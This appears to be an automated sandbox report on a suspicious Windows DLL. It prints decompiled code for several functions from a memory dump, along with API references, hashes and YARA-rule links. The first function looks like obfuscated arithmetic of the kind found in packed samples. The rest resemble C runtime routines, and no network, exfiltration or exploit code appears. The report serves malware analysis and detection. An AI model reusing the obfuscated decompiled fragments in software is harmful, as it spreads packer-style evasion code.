				_t22 =  *0x6e24b008; // 0xcac97647
				 *0x6e24b0d8 = _t22 -  *0x6e24b0d0 * 0x2f;
				 *0x6e24d304 = 0x1b;
				while( *0x6e24d304 > 1) {
					_t84 =  *0x6e24b0d8; // 0xf1cde0
					if(_t84 !=  *0x6E24B024) {
						_t116 =  *0x6e24b0d0; // 0x38c975ff
						 *0x6e24b0d8 = _t116 - 0x48;
						_t52 =  *0x6e24d304; // 0x18
						_t118 =  *0x6e24d304; // 0x18
						 *((intOrPtr*)(0x6e24b010 + _t118 * 4)) =  *((intOrPtr*)(0x6e24b010 + _t52 * 4)) +  *0x6e24b0d8;
						_t53 =  *0x6e24b0d8; // 0xf1cde0
						 *0x6e24b0d0 = _t53 + 5 -  *0x6e24b0d8;
					}
					_t87 =  *0x6e24d304; // 0x18
					 *0x6e24d304 = _t87 - 1;
				}
				_t57 =  *0x6e24b0d8; // 0xf1cde0
				_t90 =  *0x6e24b004; // 0xab810c7
				 *0x6e24b004 = _t90 - _t57 + 2 +  *0x6e24b008;
				 *0x6e24b008 = E6E1F71B0( *0x6e24b0d4 & 0x000000ff);
				 *0x6e24b00c = 0;
				_t26 =  *0x6e24b008; // 0xcac97647
				 *0x6e24b0d8 = _t26 -  *0x6e24b0d0 * 0x2f;
				 *0x6e24b0d0 = GetCurrentDirectoryA(0x70b, 0x6e24c618);
				asm("adc edx, [0x6e24b00c]");
				 *0x6e24b008 =  *0x6e24b0d8 * 0x268e +  *0x6e24b008;
				 *0x6e24b00c = 0;
				_t29 =  *0x6e24b00c; // 0x0
				_t63 =  *0x6e24b008; // 0xcac97647
				_t94 =  *0x6e24b0d0; // 0x38c975ff
				E6E1F8B90(0x6e2e2da0, "Written");
				E6E1FAC70(__eflags, _t94);
				E6E1F8B90(E6E1FAE00(__eflags, _t63, _t29), "Compare");
				__eflags =  *0x6E24B048 +  *0x6EDF8BBD - 0x2af;
				if( *0x6E24B048 +  *0x6EDF8BBD != 0x2af) {
					_t97 =  *0x6e24b000; // 0x565
					 *0x6E24B010 = _t97 -  *0x6e24b0d8 * 0x2f;
					_t99 =  *0x6e24b0d8; // 0xf1cde0
					_t38 =  *0x6e24b0d8; // 0xf1cde0
					_t10 = _t99 - 0xb401; // 0xf119df
					asm("adc edx, [0x6e24b00c]");
					_t71 = _t38 + _t10 +  *0x6e24b008 +  *0x6e24b008;
					__eflags = _t71;
					asm("adc edx, [0x6e24b00c]");
					 *0x6e24b008 = _t71;
					 *0x6e24b00c = 0;
				} else {
					_t81 =  *0x6e24b008; // 0xcac97647
					 *0x6e24b0d8 = _t81 - 0x18 +  *0x6e24b0d8;
					_t111 =  *0x6e24b0d8; // 0xf1cde0
					asm("adc eax, [0x6e24b00c]");
					 *0x6e24b008 = _t111 - 0x48 -  *0x6e24b000 +  *0x6e24b008;
					 *0x6e24b00c = 0;
				}
				_t72 =  *0x6e24b000; // 0x565
				 *0x6e24b0d0 = _t72 -  *0x6e24b0d8 * 0x2f;
				 *0x6e24d304 = 3;
				while(1) {
					__eflags =  *0x6e24d304 - 0x18;
					if( *0x6e24d304 >= 0x18) {
						break;
					}
					_t74 =  *0x6e24b0d8; // 0xf1cde0
					__eflags = _t74 -  *((intOrPtr*)(0x6edf8bbd));
					if(_t74 !=  *((intOrPtr*)(0x6edf8bbd))) {
						_t105 =  *0x6e24d304; // 0x18
						_t106 =  *0x6e24b00c; // 0x0
						_t46 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b008 = E6E203D70(_t46, _t106,  *((intOrPtr*)(0x6e24b010 + _t105 * 4)), 0);
						 *0x6e24b00c = _t106;
						_t76 =  *0x6e24b008; // 0xcac97647
						 *0x6e24b0d8 = _t76 + 5 -  *0x6e24b000;
						_v12 =  *0x6E24B038;
						_v8 = 0;
						_t49 =  *0x6e24b008; // 0xcac97647
						__eflags = _t49 - _v12;
						if(_t49 != _v12) {
							L17:
							goto L10;
						} else {
							_t80 =  *0x6e24b00c; // 0x0
							__eflags = _t80 - _v8;
							if(_t80 != _v8) {
								goto L17;
							} else {
							}
						}
					} else {
						L10:
						_t109 =  *0x6e24d304; // 0x18
						_t110 = _t109 + 1;
						__eflags = _t110;
						 *0x6e24d304 = _t110;
						continue;
					}
					break;
				}
				_t101 =  *0x6e24b000; // 0x565
				_t40 =  *0x6e24b0d8; // 0xf1cde0
				_t41 = _t40 + _t101 - 0xb401 +  *0x6e24b008 +  *0x6e24b0d8;
				__eflags = _t41;
				 *0x6e24b0d8 = _t41;
				_t42 =  *0x6e24b004; // 0xab810c7
				return _t42;
			}







































    0x6e1f8736
    0x6e1f8746
    0x6e1f874b
    0x6e1f8758
    0x6e1f875f
    0x6e1f8764
    0x6e1f877f
    0x6e1f8790
    0x6e1f879c
    0x6e1f87a0
    0x6e1f87a9
    0x6e1f87af
    0x6e1f87c1
    0x6e1f87c7
    0x6e1f87ce
    0x6e1f87dc
    0x6e1f87dc
    0x6e1f8770
    0x6e1f8779
    0x6e1f8779
    0x6e1f87e3
    0x6e1f87f2
    0x6e1f87fa
    0x6e1f8812
    0x6e1f8817
    0x6e1f8824
    0x6e1f882b
    0x6e1f8840
    0x6e1f8857
    0x6e1f885d
    0x6e1f8863
    0x6e1f886e
    0x6e1f8874
    0x6e1f887b
    0x6e1f888c
    0x6e1f8896
    0x6e1f88a3
    0x6e1f88c7
    0x6e1f88cc
    0x6e1f8914
    0x6e1f8924
    0x6e1f892a
    0x6e1f8930
    0x6e1f8935
    0x6e1f8944
    0x6e1f894a
    0x6e1f894a
    0x6e1f8950
    0x6e1f8956
    0x6e1f895c
    0x6e1f88ce
    0x6e1f88ce
    0x6e1f88dd
    0x6e1f88e3
    0x6e1f88fa
    0x6e1f8900
    0x6e1f8906
    0x6e1f8906
    0x6e1f8969
    0x6e1f8971
    0x6e1f8977
    0x6e1f8992
    0x6e1f8992
    0x6e1f8999
    0x00000000
    0x00000000
    0x6e1f89a7
    0x6e1f89ad
    0x6e1f89b3
    0x6e1f89b7
    0x6e1f89c8
    0x6e1f89cf
    0x6e1f89da
    0x6e1f89df
    0x6e1f89e5
    0x6e1f89f4
    0x6e1f8a0a
    0x6e1f8a0d
    0x6e1f8a10
    0x6e1f8a15
    0x6e1f8a18
    0x6e1f8a27
    0x00000000
    0x6e1f8a1a
    0x6e1f8a1a
    0x6e1f8a20
    0x6e1f8a23
    0x00000000
    0x00000000
    0x6e1f8a25
    0x6e1f8a23
    0x6e1f89b5
    0x6e1f8983
    0x6e1f8983
    0x6e1f8989
    0x6e1f8989
    0x6e1f898c
    0x00000000
    0x6e1f898c
    0x00000000
    0x6e1f89b3
    0x6e1f8a2c
    0x6e1f8a44
    0x6e1f8a49
    0x6e1f8a49
    0x6e1f8a4b
    0x6e1f8a50
    0x6e1f8a58

    APIs
    • GetCurrentDirectoryA.KERNEL32(0000070B,6E24C618), ref: 6E1F883A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CurrentDirectory
    • String ID: Compare$Written
    • API String ID: 1611563598-2184768711
    • Opcode ID: 1920508f1d9889a4731d1730e58d7b7c5594ae32b1e00acc027fdadc2282df35
    • Instruction ID: 1517fba0324d62492e0f3c0609178bcbbb279cee0df5c7c603ee690ff8552af6
    • Opcode Fuzzy Hash: 1920508f1d9889a4731d1730e58d7b7c5594ae32b1e00acc027fdadc2282df35
    • Instruction Fuzzy Hash: 70812D70900A04CFCB3AFF69E598A1D3BA7F786306B50A119D1298738DD7B56985CF70
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E214EEB, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E214EEB(signed int _a4, signed short* _a8, char _a12) {
				void _v8;
				signed int _v12;
				signed int _v16;
				signed short* _v20;
				void* _v24;
				long _v28;
				intOrPtr _t73;
				signed short* _t74;
				signed short* _t76;
				signed char _t77;
				signed short _t83;
				signed short _t85;
				void* _t87;
				signed short _t88;
				void* _t92;
				signed short* _t93;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t100;
				signed short _t101;
				signed short* _t104;
				void* _t105;
				char _t106;
				char _t107;
				void* _t108;
				signed short _t109;
				signed int _t110;
				signed int _t111;
				signed short* _t112;
				void* _t115;

				_t3 =  &_a12; // 0x6e2156e9
				_t111 =  *_t3;
				_t95 = _a4 >> 6;
				_t110 = (_a4 & 0x0000003f) * 0x30;
				_v12 = _t95;
				_t73 =  *((intOrPtr*)(0x6e2e36b0 + _t95 * 4));
				_t92 = 0xa;
				_v24 =  *((intOrPtr*)(_t73 + _t110 + 0x18));
				_t104 = _a8;
				if(_t111 == 0 ||  *_t104 != _t92) {
					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) & 0x000000fb;
				} else {
					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) | 0x00000004;
				}
				_t74 =  &(_t104[_t111]);
				_t93 = _t104;
				_v20 = _t74;
				_t112 = _t104;
				if(_t104 >= _t74) {
					L31:
					return _t112 - _t104 & 0xfffffffe;
				} else {
					_t76 =  &(_t104[1]);
					while(1) {
						_t96 =  *_t93 & 0x0000ffff;
						_v16 = _t96;
						_t97 = _v12;
						if(_t96 == 0x1a) {
							break;
						}
						_t105 = 0xd;
						_t104 = _a8;
						if(_v16 == _t105) {
							_t28 =  &_v20; // 0x6e2156e9
							if(_t76 >=  *_t28) {
								_t93 =  &(_t93[1]);
								_v16 =  &(_t76[1]);
								if(ReadFile(_v24,  &_v8, 2,  &_v28, 0) == 0 || _v28 == 0) {
									L23:
									_t83 = 0xd;
									 *_t112 = _t83;
									_t112 =  &(_t112[1]);
								} else {
									_t100 = _v12;
									_t85 = 0xa;
									if(( *( *((intOrPtr*)(0x6e2e36b0 + _t100 * 4)) + _t110 + 0x28) & 0x00000048) == 0) {
										if(_v8 != _t85) {
											L22:
											E6E2158E2(_a4, 0xfffffffe, 0xffffffff, 1);
											_t115 = _t115 + 0x10;
											_t87 = 0xa;
											if(_v8 == _t87) {
												L24:
												_t76 = _v16;
												L25:
												_t104 = _a8;
												L26:
												_t62 =  &_v20; // 0x6e2156e9
												if(_t93 <  *_t62) {
													continue;
												}
												goto L31;
											}
											goto L23;
										}
										_t104 = _a8;
										if(_t112 != _t104) {
											goto L22;
										}
										 *_t112 = _t85;
										_t112 =  &(_t112[1]);
										_t76 = _v16;
										goto L26;
									}
									_t106 = _v8;
									if(_t106 != _t85) {
										_t88 = 0xd;
										 *_t112 = _t88;
										 *((char*)( *((intOrPtr*)(0x6e2e36b0 + _t100 * 4)) + _t110 + 0x2a)) = _t106;
										 *((char*)( *((intOrPtr*)(0x6e2e36b0 + _t100 * 4)) + _t110 + 0x2b)) = _t106;
										_t107 = 0xa;
										 *((char*)( *((intOrPtr*)(0x6e2e36b0 + _t100 * 4)) + _t110 + 0x2c)) = _t107;
									} else {
										 *_t112 = _t85;
									}
								}
								goto L24;
							}
							_t108 = 0xa;
							_t104 = _a8;
							if( *_t76 != _t108) {
								_t109 = 0xd;
								 *_t112 = _t109;
								_t93 =  &(_t93[1]);
								_t112 =  &(_t112[1]);
								_t76 =  &(_t76[1]);
								goto L25;
							}
							_t101 = 0xa;
							_t93 =  &(_t93[2]);
							 *_t112 = _t101;
							_t76 =  &(_t76[2]);
							_t112 =  &(_t112[1]);
							goto L26;
						}
						_t93 =  &(_t93[1]);
						 *_t112 = _v16;
						_t112 =  &(_t112[1]);
						_t76 =  &(_t76[1]);
						goto L26;
					}
					_t98 =  *((intOrPtr*)(0x6e2e36b0 + _t97 * 4));
					_t77 =  *(_t98 + _t110 + 0x28);
					if((_t77 & 0x00000040) != 0) {
						 *_t112 =  *_t93;
						_t112 =  &(_t112[1]);
					} else {
						 *(_t98 + _t110 + 0x28) = _t77 | 0x00000002;
					}
					goto L31;
				}
			}



































    0x6e214efe
    0x6e214efe
    0x6e214f02
    0x6e214f05
    0x6e214f08
    0x6e214f0d
    0x6e214f14
    0x6e214f19
    0x6e214f1c
    0x6e214f21
    0x6e214f2f
    0x6e214f28
    0x6e214f28
    0x6e214f28
    0x6e214f34
    0x6e214f37
    0x6e214f39
    0x6e214f3c
    0x6e214f40
    0x6e21509d
    0x6e2150aa
    0x6e214f46
    0x6e214f46
    0x6e214f49
    0x6e214f49
    0x6e214f4c
    0x6e214f52
    0x6e214f55
    0x00000000
    0x00000000
    0x6e214f5d
    0x6e214f62
    0x6e214f65
    0x6e214f7b
    0x6e214f7e
    0x6e214fb6
    0x6e214fbb
    0x6e214fd3
    0x6e215063
    0x6e215065
    0x6e215066
    0x6e215069
    0x6e214fe3
    0x6e214fe3
    0x6e214ff4
    0x6e214ff5
    0x6e215035
    0x6e215049
    0x6e215052
    0x6e215057
    0x6e21505c
    0x6e215061
    0x6e21506c
    0x6e21506c
    0x6e21506f
    0x6e21506f
    0x6e215072
    0x6e215072
    0x6e215075
    0x00000000
    0x00000000
    0x00000000
    0x6e21507b
    0x00000000
    0x6e215061
    0x6e215037
    0x6e21503c
    0x00000000
    0x00000000
    0x6e21503e
    0x6e215041
    0x6e215044
    0x00000000
    0x6e215044
    0x6e214ff7
    0x6e214ffe
    0x6e215007
    0x6e215008
    0x6e215014
    0x6e21501f
    0x6e21502a
    0x6e21502b
    0x6e215000
    0x6e215000
    0x6e215000
    0x6e214ffe
    0x00000000
    0x6e214fd3
    0x6e214f82
    0x6e214f86
    0x6e214f89
    0x6e214fa1
    0x6e214fa2
    0x6e214fa5
    0x6e214fa8
    0x6e214fab
    0x00000000
    0x6e214fab
    0x6e214f8d
    0x6e214f8e
    0x6e214f91
    0x6e214f94
    0x6e214f97
    0x00000000
    0x6e214f97
    0x6e214f6a
    0x6e214f6d
    0x6e214f70
    0x6e214f73
    0x00000000
    0x6e214f73
    0x6e21507d
    0x6e215084
    0x6e21508a
    0x6e215097
    0x6e21509a
    0x6e21508c
    0x6e21508e
    0x6e21508e
    0x00000000
    0x6e21508a

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: V!n$V!n
    • API String ID: 0-533921133
    • Opcode ID: 1bb4f165bcd32330979b790fea8f89b244fc31385546771ff1aed2b3c551401d
    • Instruction ID: 43904a828690fce3ba8cf176089828edc3ce5a81dbbe078fe15632124272c600
    • Opcode Fuzzy Hash: 1bb4f165bcd32330979b790fea8f89b244fc31385546771ff1aed2b3c551401d
    • Instruction Fuzzy Hash: 6551C531A9825AEBCB20CFE4C891ADA77F2FF19314F14819ED6585B390D3709A81CBD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21C22A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E6E21C22A(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E6E213961(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x6e241648;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x6e241650;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E6E20F58D(_t23, _t23);
									goto L25;
								}
								if(E6E213961(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}


















    0x6e21c22f
    0x6e21c230
    0x6e21c233
    0x6e21c237
    0x6e21c2dd
    0x6e21c2f1
    0x6e21c2f6
    0x6e21c2f8
    0x6e21c2fe
    0x6e21c301
    0x6e21c303
    0x6e21c305
    0x6e21c305
    0x6e21c30b
    0x6e21c310
    0x6e21c310
    0x6e21c2fa
    0x6e21c2fa
    0x00000000
    0x6e21c2fa
    0x6e21c23d
    0x6e21c242
    0x00000000
    0x00000000
    0x6e21c248
    0x6e21c24d
    0x6e21c24f
    0x6e21c24f
    0x6e21c255
    0x00000000
    0x00000000
    0x6e21c25a
    0x6e21c271
    0x6e21c271
    0x6e21c27a
    0x6e21c27c
    0x00000000
    0x00000000
    0x6e21c27e
    0x6e21c283
    0x6e21c285
    0x6e21c285
    0x6e21c28b
    0x00000000
    0x00000000
    0x6e21c290
    0x6e21c2ae
    0x6e21c2ae
    0x6e21c2b0
    0x6e21c2d5
    0x00000000
    0x6e21c2da
    0x6e21c2cd
    0x00000000
    0x00000000
    0x6e21c2cf
    0x00000000
    0x6e21c2cf
    0x6e21c292
    0x6e21c29a
    0x00000000
    0x00000000
    0x6e21c29c
    0x6e21c29f
    0x6e21c2a5
    0x00000000
    0x00000000
    0x00000000
    0x6e21c2a7
    0x6e21c2a9
    0x6e21c2ab
    0x6e21c2ab
    0x00000000
    0x6e21c2ab
    0x6e21c25c
    0x6e21c264
    0x00000000
    0x00000000
    0x6e21c266
    0x6e21c269
    0x6e21c26f
    0x00000000
    0x00000000
    0x00000000
    0x6e21c26f
    0x6e21c275
    0x6e21c277
    0x6e21c277
    0x00000000

    APIs
    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E21C485,?,00000050,?,?,?,?,?), ref: 6E21C305
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: ACP$OCP
    • API String ID: 0-711371036
    • Opcode ID: e68ff69f863482e22272c2c51ea70413bbe2db8555be46c6c9528fc3573f090f
    • Instruction ID: 39dbcf25e1cfd241b4f5f6e31ff07bf023522ae56dcf136b440567767339dc3d
    • Opcode Fuzzy Hash: e68ff69f863482e22272c2c51ea70413bbe2db8555be46c6c9528fc3573f090f
    • Instruction Fuzzy Hash: 1B21D66AA5C10EA7E75C8AD98903BC763E7AB95F66F124430DB09DF504E732DB408251
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E212635, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E212635(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6E209118(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6E20BB7E())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6E20BB7E())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6E218445(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6E20BB7E())) = 0x16;
					return E6E208929() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























    0x6e212635
    0x6e21263e
    0x6e212643
    0x6e212646
    0x6e21264a
    0x6e212659
    0x6e21265c
    0x6e21267c
    0x6e212681
    0x6e212684
    0x6e212686
    0x6e212754
    0x6e21275a
    0x6e21276f
    0x6e21277b
    0x6e212781
    0x6e212783
    0x6e212792
    0x6e212792
    0x6e212792
    0x6e212795
    0x6e212795
    0x6e212799
    0x6e21279b
    0x6e21279e
    0x6e21279e
    0x6e21279e
    0x6e21279e
    0x00000000
    0x6e2127a5
    0x6e21278a
    0x00000000
    0x6e21278a
    0x6e21275c
    0x6e21275f
    0x6e21275f
    0x6e212762
    0x6e212762
    0x6e212764
    0x6e212765
    0x6e212765
    0x6e212769
    0x00000000
    0x6e212769
    0x6e21268c
    0x6e212692
    0x6e2126bf
    0x6e2126cb
    0x6e2126d1
    0x6e2126d3
    0x00000000
    0x00000000
    0x6e2126d9
    0x6e2126df
    0x6e2126e2
    0x6e21273e
    0x6e212743
    0x6e21274b
    0x00000000
    0x6e21274b
    0x6e2126e4
    0x6e2126e7
    0x6e2126e9
    0x6e2126ec
    0x6e2126ee
    0x6e2126f0
    0x6e212726
    0x6e212734
    0x6e21273a
    0x6e21273c
    0x6e212750
    0x00000000
    0x6e212750
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2126f2
    0x6e2126f2
    0x6e2126f2
    0x6e2126f5
    0x6e2126f8
    0x6e2126fa
    0x00000000
    0x00000000
    0x6e212704
    0x6e21270b
    0x6e21270e
    0x6e212710
    0x6e212718
    0x6e212718
    0x6e21271b
    0x6e21271c
    0x6e21271f
    0x6e212721
    0x00000000
    0x00000000
    0x00000000
    0x6e212721
    0x6e212712
    0x6e212713
    0x6e212716
    0x00000000
    0x00000000
    0x00000000
    0x6e212716
    0x6e212723
    0x00000000
    0x6e212723
    0x6e212694
    0x6e212696
    0x00000000
    0x00000000
    0x6e21269c
    0x6e21269f
    0x6e2126a3
    0x6e2126a6
    0x6e2126aa
    0x00000000
    0x00000000
    0x6e2126b0
    0x6e2126b1
    0x6e2126b4
    0x6e2126b6
    0x00000000
    0x00000000
    0x00000000
    0x6e2126b8
    0x00000000
    0x6e21269f
    0x6e212663
    0x00000000
    0x6e21266e
    0x6e212650
    0x6e212656
    0x00000000
    0x6e212656
    0x6e2127ad

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 6E2126CB
    • GetLastError.KERNEL32 ref: 6E2126D9
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6E212734
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWide$ErrorLast
    • String ID:
    • API String ID: 1717984340-0
    • Opcode ID: b21cb921dec16192171a65a37746619ea0d90a228c5d0371e231e9b54d87839d
    • Instruction ID: 0e2d0578ab686d54f3594c4e0328da96b29eebb99ea0949cb5016d044d711b68
    • Opcode Fuzzy Hash: b21cb921dec16192171a65a37746619ea0d90a228c5d0371e231e9b54d87839d
    • Instruction Fuzzy Hash: 8341E77660835BAFDF518FE4C854AEB77FAAF07361F104158FA546B194EB308A02D750
    Uniqueness

    Uniqueness Score: -1.00%